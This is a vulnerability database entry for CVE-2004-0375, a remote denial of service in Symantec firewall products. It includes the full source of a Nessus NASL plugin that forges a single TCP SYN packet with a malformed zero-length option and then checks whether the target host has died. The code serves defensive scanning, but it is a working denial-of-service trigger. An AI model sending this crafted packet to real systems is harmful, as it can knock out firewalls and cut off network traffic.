Vulnerabilities > CVE-2004-0375 - Remote Denial Of Service vulnerability in Symantec Client Firewall Products SYMNDIS.SYS Driver

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
symantec
nessus
exploit available
NVD
Published: 2004-08-18
Updated: 2017-07-11

Summary

SYMNDIS.SYS in Symantec Norton Internet Security 2003 and 2004, Norton Personal Firewall 2003 and 2004, Client Firewall 5.01 and 5.1.1, and Client Security 1.0 and 1.1 allow remote attackers to cause a denial of service (infinite loop) via a TCP packet with (1) SACK option or (2) Alternate Checksum Data option followed by a length of zero.

Vulnerable Configurations

Part Description Count
Application
Symantec
10

Exploit-Db

descriptionSymantec Client Firewall Products 5 SYMNDIS.SYS Driver Remote Denial Of Service Vulnerability. CVE-2004-0375. Dos exploit for windows platform
idEDB-ID:23846
last seen2016-02-02
modified2004-03-18
published2004-03-18
reportereEye Digital Security Team
sourcehttps://www.exploit-db.com/download/23846/
titleSymantec Client Firewall Products 5 SYMNDIS.SYS Driver Remote Denial of Service Vulnerability

Nessus

NASL familyFirewalls
NASL idTCP_OPTIONS_DOS.NASL
descriptionThe remote system appears vulnerable to an invalid Options field within a TCP packet. At least one vendor firewall (Symantec) has been reported prone to such a bug. An attacker, utilizing this flaw, would be able to remotely shut down the remote firewall (stopping all network-based transactions) by sending a single packet to any port.
last seen2020-06-01
modified2020-06-02
plugin id12216
published2004-04-26
reporterThis script is (C) 2004-2019 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12216
titleSymantec Firewall Malformed TCP Packet Options Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(12216);
  script_version("1.24");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  script_cve_id("CVE-2004-0375");
  script_bugtraq_id(10204);

  script_name(english:"Symantec Firewall Malformed TCP Packet Options Remote DoS");
  script_summary(english:"Check for TCP options bug on the remote host");

  script_set_attribute(attribute:"synopsis", value:"The remote host is affected by a denial of service vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote system appears vulnerable to an invalid Options field
within a TCP packet. At least one vendor firewall (Symantec) has been
reported prone to such a bug. An attacker, utilizing this flaw, would
be able to remotely shut down the remote firewall (stopping all
network-based transactions) by sending a single packet to any port.");
  script_set_attribute(attribute:"see_also", value:"https://www.beyondtrust.com/resources/blog/research/");
  script_set_attribute(attribute:"solution", value:"Apply vendor-supplied patches.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2004/04/20");
  script_set_attribute(attribute:"patch_publication_date", value:"2004/04/20");
  script_set_attribute(attribute:"plugin_publication_date", value:"2004/04/26");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_family(english:"Firewalls");
  script_copyright(english:"This script is (C) 2004-2019 Tenable Network Security, Inc.");

  script_require_keys("Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if ( TARGET_IS_IPV6 ) exit(0);
#
# The script code starts here


# get an open port and name it port
port = get_host_open_port();
if (!port || port == 139 || port == 445 ) exit(0);
soc = open_sock_tcp(port);
if ( ! soc ) exit(0);
close(soc);
rport = (rand() % 50000) + 1024;
dstaddr=get_host_ip();
srcaddr=compat::this_host();


# goofy packet which looks like:
# Sample Packet (as reported by eeye):
# 40 00 57 4B 00 00 01 01 05 00
# |___| |___| |___| |_________|
#   |     |     |        |
#  |     |     |    TCP Options
#  |     |  Urgent Pointer
#  |  Checksum
# Window Size


ip2 = forge_ip_packet(   ip_v : 4,
                        ip_hl : 5,
                        ip_tos : 0,
                        ip_len : 20,
                        ip_id : 0xABA,
                        ip_p : IPPROTO_TCP,
                        ip_ttl : 255,
                        ip_off : 0,
                        ip_src : srcaddr);

tcpip = forge_tcp_packet(    ip       : ip2,
                             th_sport : rport,
                             th_dport : rport,
                             th_flags : TH_SYN,
                             th_seq   : 0xABBA,
                             th_ack   : 0,
                             th_x2    : 0,
                             th_off   : 6,
                             th_win   : 512,
                             th_urp   : 0,
                             data     : raw_string(0x01,0x01,0x05,0x00) );

result = send_packet(tcpip,pcap_active:FALSE);

for (i = 0; i < 3; i ++)
{
 sleep(1);
 soc = open_sock_tcp(port);
 if (soc) { close(soc); exit(0); }
}

security_hole(port);
set_kb_item(name:"Host/dead", value:TRUE);

References